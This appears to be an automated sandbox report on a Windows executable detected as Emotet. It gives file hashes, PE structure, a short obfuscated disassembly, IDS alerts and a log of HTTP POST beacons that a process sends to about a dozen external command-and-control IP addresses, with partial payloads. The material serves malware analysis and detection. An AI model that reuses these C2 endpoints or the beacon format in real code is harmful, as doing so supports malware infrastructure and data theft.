                                            Josho.x86.elfGet hashmaliciousUnknownBrowse
                                            • 201.65.85.19
                                            No context
                                            No context
                                            No created / dropped files found
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):3.57045342606847
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:75A0VTo3z9.exe
                                            File size:117'248 bytes
                                            MD5:921577c536c85169a26caf0b69a6d82d
                                            SHA1:48d8297b4a9debaa7b777f877019ce73777fbaed
                                            SHA256:4fc5f4f5462c4a65137c2121d4af6faae8e39aeb164842073a7e361527e879e5
                                            SHA512:3b67a27f5d2346201427d1b11bed311d7cd1b7439d63790b097a79b7cc7cce8b6602a382cfc3300539a17f8d726db13a41229b6e314b87f52c9434ff68669daf
                                            SSDEEP:768:S4TAjkyUEfZGvPpNPqzvuhR/2Q293H7lbqne6ZlOS/1XlkcROFsNjle23:SYpEfoHpNSzvuhk9XxMe6/tXlLdle
                                            TLSH:D4B30713BD86E7B7ED99D0F91299B1325A6BE83153434EE3633434D2CD22AE409B438D
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../.../.../...".J.....R.p.....R.K.....Rich/...................PE..L...Imj_.............................Z............@........
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x405ad0
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x5F6A6D49 [Tue Sep 22 21:31:53 2020 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:
                                            Instruction
                                            call 00007F6C0921A6F0h
                                            mov eax, dword ptr [0040DC08h]
                                            test eax, eax
                                            jne 00007F6C09219E9Dh
                                            mov ecx, FC2B3A39h
                                            call 00007F6C092180ADh
                                            mov edx, CBEC572Eh
                                            mov ecx, eax
                                            call 00007F6C09218001h
                                            mov dword ptr [0040DC08h], eax
                                            push 00000000h
                                            call eax
                                            retn 0010h
                                            push ecx
                                            mov dword ptr [esp], 0000A2E6h
                                            add dword ptr [esp], FFFF7562h
                                            add dword ptr [esp], 0000A078h
                                            add dword ptr [esp], 0000E5E0h
                                            add dword ptr [esp], FFFF3334h
                                            xor dword ptr [esp], 0000D094h
                                            mov eax, dword ptr [esp]
                                            pop ecx
                                            ret
                                            push ecx
                                            mov dword ptr [esp], 0000FA5Dh
                                            xor dword ptr [esp], F1A223BDh
                                            add dword ptr [esp], FFFF6D32h
                                            shl dword ptr [esp], 10h
                                            shl dword ptr [esp], 06h
                                            or dword ptr [esp], F886370Ch
                                            xor dword ptr [esp], 7EE3CF9Fh
                                            xor dword ptr [esp], 8265F833h
                                            mov eax, dword ptr [esp]
                                            pop ecx
                                            ret
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            push ecx
                                            mov dword ptr [esp], 0000C5A7h
                                            mov eax, BACF914Dh
                                            mov ecx, dword ptr [esp]
                                            mul ecx
                                            mov eax, CCCCCCCDh
                                            sub ecx, edx
                                            shr ecx, 1
                                            add ecx, edx
                                            shr ecx, 05h
                                            mov dword ptr [esp], ecx
                                            add dword ptr [esp], 00005C43h
                                            Programming Language:
                                            • [ASM] VS2013 build 21005
                                            • [LNK] VS2013 UPD4 build 31101
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x1086c.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf0000x6f8.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xa4140xa600e7cc42b73cead3402805381dd905f35aFalse0.5446159638554217data6.784082086728776IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0xc0000x20x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xd0000x18bc0xc004167e51df8e443e63cd314d7aedaa4d7False0.8297526041666666data7.290256002041044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .reloc0xf0000x6f80x8005badcb3381e3a2c196449dac289bce10False0.77197265625data6.257800178446006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            .rsrc0x100000x1086c0x10a006f6ad4f970d17eba523a27c49c1a5affFalse0.0026580122180451127data0.010291792732545248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_RCDATA0x1006c0x10800data0.0019679214015151515
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-11-11T18:19:44.132415+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.549704177.23.7.15180TCP
                                            2024-11-11T18:19:44.132415+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.549704177.23.7.15180TCP
                                            2024-11-11T18:19:48.724884+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549707TCP
                                            2024-11-11T18:19:55.423980+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.54970595.85.33.238080TCP
                                            2024-11-11T18:19:55.423980+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.54970595.85.33.238080TCP
                                            2024-11-11T18:20:00.010809+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.549805192.232.229.547080TCP
                                            2024-11-11T18:20:00.010809+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.549805192.232.229.547080TCP
                                            2024-11-11T18:20:11.143464+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.54982746.101.58.378080TCP
                                            2024-11-11T18:20:11.143464+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.54982746.101.58.378080TCP
                                            2024-11-11T18:20:23.732625+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.54991070.32.115.1578080TCP
                                            2024-11-11T18:20:23.732625+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.54991070.32.115.1578080TCP
                                            2024-11-11T18:20:26.471992+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549982TCP
                                            2024-11-11T18:20:26.817308+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.549983111.67.12.2218080TCP
                                            2024-11-11T18:20:26.817308+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.549983111.67.12.2218080TCP
                                            2024-11-11T18:20:38.793014+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.54998498.13.75.19680TCP
                                            2024-11-11T18:20:38.793014+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.54998498.13.75.19680TCP
                                            2024-11-11T18:20:42.795138+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.5499855.196.35.1387080TCP
                                            2024-11-11T18:20:54.808412+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.54998674.58.215.22680TCP
                                            2024-11-11T18:20:54.808412+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.54998674.58.215.22680TCP
                                            2024-11-11T18:21:06.802079+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.549989186.70.127.1998090TCP
                                            2024-11-11T18:21:06.802079+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.549989186.70.127.1998090TCP
                                            2024-11-11T18:21:19.028845+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.5499901.226.84.2438080TCP
                                            2024-11-11T18:21:19.028845+01002854388ETPRO MALWARE Win32/Emotet CnC Activity (POST) M131192.168.2.5499901.226.84.2438080TCP
                                            2024-11-11T18:21:31.114013+01002030868ET MALWARE Win32/Emotet CnC Activity (POST) M101192.168.2.54999112.162.84.28080TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 11, 2024 18:19:42.372733116 CET4970480192.168.2.5177.23.7.151
                                            Nov 11, 2024 18:19:42.377868891 CET8049704177.23.7.151192.168.2.5
                                            Nov 11, 2024 18:19:42.377938986 CET4970480192.168.2.5177.23.7.151
                                            Nov 11, 2024 18:19:42.378078938 CET4970480192.168.2.5177.23.7.151
                                            Nov 11, 2024 18:19:42.378108025 CET4970480192.168.2.5177.23.7.151
                                            Nov 11, 2024 18:19:42.382910967 CET8049704177.23.7.151192.168.2.5
                                            Nov 11, 2024 18:19:42.382934093 CET8049704177.23.7.151192.168.2.5
                                            Nov 11, 2024 18:19:42.382953882 CET8049704177.23.7.151192.168.2.5
                                            Nov 11, 2024 18:19:42.382962942 CET8049704177.23.7.151192.168.2.5
                                            Nov 11, 2024 18:19:42.382973909 CET8049704177.23.7.151192.168.2.5
                                            Nov 11, 2024 18:19:44.132297039 CET8049704177.23.7.151192.168.2.5
                                            Nov 11, 2024 18:19:44.132415056 CET4970480192.168.2.5177.23.7.151
                                            Nov 11, 2024 18:19:44.132607937 CET4970480192.168.2.5177.23.7.151
                                            Nov 11, 2024 18:19:44.132613897 CET8049704177.23.7.151192.168.2.5
                                            Nov 11, 2024 18:19:44.132657051 CET4970480192.168.2.5177.23.7.151
                                            Nov 11, 2024 18:19:44.137605906 CET8049704177.23.7.151192.168.2.5
                                            Nov 11, 2024 18:19:46.931725979 CET497058080192.168.2.595.85.33.23
                                            Nov 11, 2024 18:19:47.083909035 CET80804970595.85.33.23192.168.2.5
                                            Nov 11, 2024 18:19:47.084053040 CET497058080192.168.2.595.85.33.23
                                            Nov 11, 2024 18:19:47.084258080 CET497058080192.168.2.595.85.33.23
                                            Nov 11, 2024 18:19:47.084319115 CET497058080192.168.2.595.85.33.23
                                            Nov 11, 2024 18:19:47.089044094 CET80804970595.85.33.23192.168.2.5
                                            Nov 11, 2024 18:19:47.089164019 CET80804970595.85.33.23192.168.2.5
                                            Nov 11, 2024 18:19:47.089174986 CET80804970595.85.33.23192.168.2.5
                                            Nov 11, 2024 18:19:47.089210033 CET80804970595.85.33.23192.168.2.5
                                            Nov 11, 2024 18:19:47.089219093 CET80804970595.85.33.23192.168.2.5
                                            Nov 11, 2024 18:19:55.423873901 CET80804970595.85.33.23192.168.2.5
                                            Nov 11, 2024 18:19:55.423979998 CET497058080192.168.2.595.85.33.23
                                            Nov 11, 2024 18:19:55.424099922 CET497058080192.168.2.595.85.33.23
                                            Nov 11, 2024 18:19:55.429027081 CET80804970595.85.33.23192.168.2.5
                                            Nov 11, 2024 18:19:59.600291967 CET498057080192.168.2.5192.232.229.54
                                            Nov 11, 2024 18:19:59.605340004 CET708049805192.232.229.54192.168.2.5
                                            Nov 11, 2024 18:19:59.605442047 CET498057080192.168.2.5192.232.229.54
                                            Nov 11, 2024 18:19:59.605706930 CET498057080192.168.2.5192.232.229.54
                                            Nov 11, 2024 18:19:59.605763912 CET498057080192.168.2.5192.232.229.54
                                            Nov 11, 2024 18:19:59.610676050 CET708049805192.232.229.54192.168.2.5
                                            Nov 11, 2024 18:19:59.610794067 CET708049805192.232.229.54192.168.2.5
                                            Nov 11, 2024 18:19:59.610805035 CET708049805192.232.229.54192.168.2.5
                                            Nov 11, 2024 18:19:59.610816956 CET708049805192.232.229.54192.168.2.5
                                            Nov 11, 2024 18:19:59.610827923 CET708049805192.232.229.54192.168.2.5
                                            Nov 11, 2024 18:20:00.010669947 CET708049805192.232.229.54192.168.2.5
                                            Nov 11, 2024 18:20:00.010808945 CET498057080192.168.2.5192.232.229.54
                                            Nov 11, 2024 18:20:00.011029005 CET498057080192.168.2.5192.232.229.54
                                            Nov 11, 2024 18:20:00.016829014 CET708049805192.232.229.54192.168.2.5
                                            Nov 11, 2024 18:20:02.799365997 CET498278080192.168.2.546.101.58.37
                                            Nov 11, 2024 18:20:02.804371119 CET80804982746.101.58.37192.168.2.5
                                            Nov 11, 2024 18:20:02.804505110 CET498278080192.168.2.546.101.58.37
                                            Nov 11, 2024 18:20:02.804625988 CET498278080192.168.2.546.101.58.37
                                            Nov 11, 2024 18:20:02.804663897 CET498278080192.168.2.546.101.58.37
                                            Nov 11, 2024 18:20:02.809525013 CET80804982746.101.58.37192.168.2.5
                                            Nov 11, 2024 18:20:02.809536934 CET80804982746.101.58.37192.168.2.5
                                            Nov 11, 2024 18:20:02.809566021 CET80804982746.101.58.37192.168.2.5
                                            Nov 11, 2024 18:20:02.809575081 CET80804982746.101.58.37192.168.2.5
                                            Nov 11, 2024 18:20:02.809737921 CET80804982746.101.58.37192.168.2.5
                                            Nov 11, 2024 18:20:11.143389940 CET80804982746.101.58.37192.168.2.5
                                            Nov 11, 2024 18:20:11.143464088 CET498278080192.168.2.546.101.58.37
                                            Nov 11, 2024 18:20:11.144231081 CET498278080192.168.2.546.101.58.37
                                            Nov 11, 2024 18:20:11.150329113 CET80804982746.101.58.37192.168.2.5
                                            Nov 11, 2024 18:20:14.944189072 CET499108080192.168.2.570.32.115.157
                                            Nov 11, 2024 18:20:15.393939018 CET80804991070.32.115.157192.168.2.5
                                            Nov 11, 2024 18:20:15.394066095 CET499108080192.168.2.570.32.115.157
                                            Nov 11, 2024 18:20:15.394347906 CET499108080192.168.2.570.32.115.157
                                            Nov 11, 2024 18:20:15.394390106 CET499108080192.168.2.570.32.115.157
                                            Nov 11, 2024 18:20:15.401778936 CET80804991070.32.115.157192.168.2.5
                                            Nov 11, 2024 18:20:15.401849031 CET80804991070.32.115.157192.168.2.5
                                            Nov 11, 2024 18:20:15.402652979 CET80804991070.32.115.157192.168.2.5
                                            Nov 11, 2024 18:20:15.402791977 CET80804991070.32.115.157192.168.2.5
                                            Nov 11, 2024 18:20:15.402801991 CET80804991070.32.115.157192.168.2.5
                                            Nov 11, 2024 18:20:23.732526064 CET80804991070.32.115.157192.168.2.5
                                            Nov 11, 2024 18:20:23.732625008 CET499108080192.168.2.570.32.115.157
                                            Nov 11, 2024 18:20:23.732721090 CET499108080192.168.2.570.32.115.157
                                            Nov 11, 2024 18:20:23.737627029 CET80804991070.32.115.157192.168.2.5
                                            Nov 11, 2024 18:20:26.273328066 CET499838080192.168.2.5111.67.12.221
                                            Nov 11, 2024 18:20:26.278342009 CET808049983111.67.12.221192.168.2.5
                                            Nov 11, 2024 18:20:26.278485060 CET499838080192.168.2.5111.67.12.221
                                            Nov 11, 2024 18:20:26.278662920 CET499838080192.168.2.5111.67.12.221
                                            Nov 11, 2024 18:20:26.278700113 CET499838080192.168.2.5111.67.12.221
                                            Nov 11, 2024 18:20:26.283842087 CET808049983111.67.12.221192.168.2.5
                                            Nov 11, 2024 18:20:26.283900023 CET808049983111.67.12.221192.168.2.5
                                            Nov 11, 2024 18:20:26.283932924 CET808049983111.67.12.221192.168.2.5
                                            Nov 11, 2024 18:20:26.283942938 CET808049983111.67.12.221192.168.2.5
                                            Nov 11, 2024 18:20:26.284020901 CET808049983111.67.12.221192.168.2.5
                                            Nov 11, 2024 18:20:26.817042112 CET808049983111.67.12.221192.168.2.5
                                            Nov 11, 2024 18:20:26.817307949 CET499838080192.168.2.5111.67.12.221
                                            Nov 11, 2024 18:20:26.817456007 CET499838080192.168.2.5111.67.12.221
                                            Nov 11, 2024 18:20:26.822338104 CET808049983111.67.12.221192.168.2.5
                                            Nov 11, 2024 18:20:30.455580950 CET4998480192.168.2.598.13.75.196
                                            Nov 11, 2024 18:20:30.460555077 CET804998498.13.75.196192.168.2.5
                                            Nov 11, 2024 18:20:30.460633993 CET4998480192.168.2.598.13.75.196
                                            Nov 11, 2024 18:20:30.460777998 CET4998480192.168.2.598.13.75.196
                                            Nov 11, 2024 18:20:30.460812092 CET4998480192.168.2.598.13.75.196
                                            Nov 11, 2024 18:20:30.465884924 CET804998498.13.75.196192.168.2.5
                                            Nov 11, 2024 18:20:30.465934992 CET804998498.13.75.196192.168.2.5
                                            Nov 11, 2024 18:20:30.465985060 CET804998498.13.75.196192.168.2.5
                                            Nov 11, 2024 18:20:30.466061115 CET804998498.13.75.196192.168.2.5
                                            Nov 11, 2024 18:20:30.466069937 CET804998498.13.75.196192.168.2.5
                                            Nov 11, 2024 18:20:38.792929888 CET804998498.13.75.196192.168.2.5
                                            Nov 11, 2024 18:20:38.793014050 CET4998480192.168.2.598.13.75.196
                                            Nov 11, 2024 18:20:38.793102980 CET4998480192.168.2.598.13.75.196
                                            Nov 11, 2024 18:20:38.797904968 CET804998498.13.75.196192.168.2.5
                                            Nov 11, 2024 18:20:42.383889914 CET499857080192.168.2.55.196.35.138
                                            Nov 11, 2024 18:20:42.388889074 CET7080499855.196.35.138192.168.2.5
                                            Nov 11, 2024 18:20:42.388978004 CET499857080192.168.2.55.196.35.138
                                            Nov 11, 2024 18:20:42.389178991 CET499857080192.168.2.55.196.35.138
                                            Nov 11, 2024 18:20:42.389218092 CET499857080192.168.2.55.196.35.138
                                            Nov 11, 2024 18:20:42.393954992 CET7080499855.196.35.138192.168.2.5
                                            Nov 11, 2024 18:20:42.394028902 CET7080499855.196.35.138192.168.2.5
                                            Nov 11, 2024 18:20:42.394038916 CET7080499855.196.35.138192.168.2.5
                                            Nov 11, 2024 18:20:42.394433975 CET7080499855.196.35.138192.168.2.5
                                            Nov 11, 2024 18:20:42.394469023 CET7080499855.196.35.138192.168.2.5
                                            Nov 11, 2024 18:20:42.794977903 CET7080499855.196.35.138192.168.2.5
                                            Nov 11, 2024 18:20:42.795137882 CET499857080192.168.2.55.196.35.138
                                            Nov 11, 2024 18:20:42.795342922 CET499857080192.168.2.55.196.35.138
                                            Nov 11, 2024 18:20:42.800206900 CET7080499855.196.35.138192.168.2.5
                                            Nov 11, 2024 18:20:46.464622974 CET4998680192.168.2.574.58.215.226
                                            Nov 11, 2024 18:20:46.469784021 CET804998674.58.215.226192.168.2.5
                                            Nov 11, 2024 18:20:46.469872952 CET4998680192.168.2.574.58.215.226
                                            Nov 11, 2024 18:20:46.470030069 CET4998680192.168.2.574.58.215.226
                                            Nov 11, 2024 18:20:46.470077991 CET4998680192.168.2.574.58.215.226
                                            Nov 11, 2024 18:20:46.474996090 CET804998674.58.215.226192.168.2.5
                                            Nov 11, 2024 18:20:46.475016117 CET804998674.58.215.226192.168.2.5
                                            Nov 11, 2024 18:20:46.475025892 CET804998674.58.215.226192.168.2.5
                                            Nov 11, 2024 18:20:46.475037098 CET804998674.58.215.226192.168.2.5
                                            Nov 11, 2024 18:20:46.475272894 CET804998674.58.215.226192.168.2.5
                                            Nov 11, 2024 18:20:54.808249950 CET804998674.58.215.226192.168.2.5
                                            Nov 11, 2024 18:20:54.808412075 CET4998680192.168.2.574.58.215.226
                                            Nov 11, 2024 18:20:54.808612108 CET4998680192.168.2.574.58.215.226
                                            Nov 11, 2024 18:20:54.813966036 CET804998674.58.215.226192.168.2.5
                                            Nov 11, 2024 18:20:58.457366943 CET499898090192.168.2.5186.70.127.199
                                            Nov 11, 2024 18:20:58.462425947 CET809049989186.70.127.199192.168.2.5
                                            Nov 11, 2024 18:20:58.462527990 CET499898090192.168.2.5186.70.127.199
                                            Nov 11, 2024 18:20:58.462727070 CET499898090192.168.2.5186.70.127.199
                                            Nov 11, 2024 18:20:58.462786913 CET499898090192.168.2.5186.70.127.199
                                            Nov 11, 2024 18:20:58.467744112 CET809049989186.70.127.199192.168.2.5
                                            Nov 11, 2024 18:20:58.467758894 CET809049989186.70.127.199192.168.2.5
                                            Nov 11, 2024 18:20:58.467767954 CET809049989186.70.127.199192.168.2.5
                                            Nov 11, 2024 18:20:58.467777967 CET809049989186.70.127.199192.168.2.5
                                            Nov 11, 2024 18:20:58.467871904 CET809049989186.70.127.199192.168.2.5
                                            Nov 11, 2024 18:21:06.801879883 CET809049989186.70.127.199192.168.2.5
                                            Nov 11, 2024 18:21:06.802078962 CET499898090192.168.2.5186.70.127.199
                                            Nov 11, 2024 18:21:06.802246094 CET499898090192.168.2.5186.70.127.199
                                            Nov 11, 2024 18:21:06.806974888 CET809049989186.70.127.199192.168.2.5
                                            Nov 11, 2024 18:21:10.455652952 CET499908080192.168.2.51.226.84.243
                                            Nov 11, 2024 18:21:10.671499968 CET8080499901.226.84.243192.168.2.5
                                            Nov 11, 2024 18:21:10.671633005 CET499908080192.168.2.51.226.84.243
                                            Nov 11, 2024 18:21:10.671874046 CET499908080192.168.2.51.226.84.243
                                            Nov 11, 2024 18:21:10.671926975 CET499908080192.168.2.51.226.84.243
                                            Nov 11, 2024 18:21:10.676651001 CET8080499901.226.84.243192.168.2.5
                                            Nov 11, 2024 18:21:10.676810026 CET8080499901.226.84.243192.168.2.5
                                            Nov 11, 2024 18:21:10.676820040 CET8080499901.226.84.243192.168.2.5
                                            Nov 11, 2024 18:21:10.676827908 CET8080499901.226.84.243192.168.2.5
                                            Nov 11, 2024 18:21:10.679944992 CET8080499901.226.84.243192.168.2.5
                                            Nov 11, 2024 18:21:19.028773069 CET8080499901.226.84.243192.168.2.5
                                            Nov 11, 2024 18:21:19.028845072 CET499908080192.168.2.51.226.84.243
                                            Nov 11, 2024 18:21:19.028932095 CET499908080192.168.2.51.226.84.243
                                            Nov 11, 2024 18:21:19.033759117 CET8080499901.226.84.243192.168.2.5
                                            Nov 11, 2024 18:21:22.755518913 CET499918080192.168.2.512.162.84.2
                                            Nov 11, 2024 18:21:22.760776997 CET80804999112.162.84.2192.168.2.5
                                            Nov 11, 2024 18:21:22.760898113 CET499918080192.168.2.512.162.84.2
                                            Nov 11, 2024 18:21:22.761102915 CET499918080192.168.2.512.162.84.2
                                            Nov 11, 2024 18:21:22.761157990 CET499918080192.168.2.512.162.84.2
                                            Nov 11, 2024 18:21:22.765904903 CET80804999112.162.84.2192.168.2.5
                                            Nov 11, 2024 18:21:22.766053915 CET80804999112.162.84.2192.168.2.5
                                            Nov 11, 2024 18:21:22.766063929 CET80804999112.162.84.2192.168.2.5
                                            Nov 11, 2024 18:21:22.766098976 CET80804999112.162.84.2192.168.2.5
                                            Nov 11, 2024 18:21:22.766235113 CET80804999112.162.84.2192.168.2.5
                                            Nov 11, 2024 18:21:31.113861084 CET80804999112.162.84.2192.168.2.5
                                            Nov 11, 2024 18:21:31.114012957 CET499918080192.168.2.512.162.84.2
                                            Nov 11, 2024 18:21:31.114120960 CET499918080192.168.2.512.162.84.2
                                            Nov 11, 2024 18:21:31.118925095 CET80804999112.162.84.2192.168.2.5
                                            • 177.23.7.151
                                            • 95.85.33.23
                                              • 95.85.33.23:8080
                                            • 192.232.229.54
                                              • 192.232.229.54:7080
                                            • 46.101.58.37
                                              • 46.101.58.37:8080
                                            • 70.32.115.157
                                              • 70.32.115.157:8080
                                            • 111.67.12.221
                                              • 111.67.12.221:8080
                                            • 98.13.75.196
                                            • 5.196.35.138
                                              • 5.196.35.138:7080
                                            • 74.58.215.226
                                            • 186.70.127.199
                                              • 186.70.127.199:8090
                                            • 1.226.84.243
                                              • 1.226.84.243:8080
                                            • 12.162.84.2
                                              • 12.162.84.2:8080
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549704177.23.7.151803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:19:42.378078938 CET602OUTPOST /3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=------------c1rFprRPYfa1
                                            Host: 177.23.7.151
                                            Content-Length: 4676
                                            Cache-Control: no-cache
                                            Nov 11, 2024 18:19:42.378108025 CET4676OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 31 72 46 70 72 52 50 59 66 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 65 65 63 67 79 73 65 22 3b 20 66 69 6c 65
                                            Data Ascii: --------------c1rFprRPYfa1Content-Disposition: form-data; name="eecgyse"; filename="gtgueorflpckccfscid"Content-Type: application/octet-streamj:vLZ*h]9N\{@ \EY\T: _Nc[Zc+^,-t<j


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.54970595.85.33.2380803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:19:47.084258080 CET535OUTPOST /0POplCNbRBZ4or4A/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 95.85.33.23/0POplCNbRBZ4or4A/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=--------------------czaXol8AYsgziFOrfodC
                                            Host: 95.85.33.23:8080
                                            Content-Length: 4676
                                            Cache-Control: no-cache


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549805192.232.229.5470803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:19:59.605706930 CET541OUTPOST /xbe2duP8y5opIK2l/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 192.232.229.54/xbe2duP8y5opIK2l/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=--------------------obA8YhSs1fssjgUX6Gq8
                                            Host: 192.232.229.54:7080
                                            Content-Length: 4660
                                            Cache-Control: no-cache


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.54982746.101.58.3780803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:20:02.804625988 CET657OUTPOST /Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 46.101.58.37/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=-----------------------mZOPwTXQDnkMiVqVaBOtPqF
                                            Host: 46.101.58.37:8080
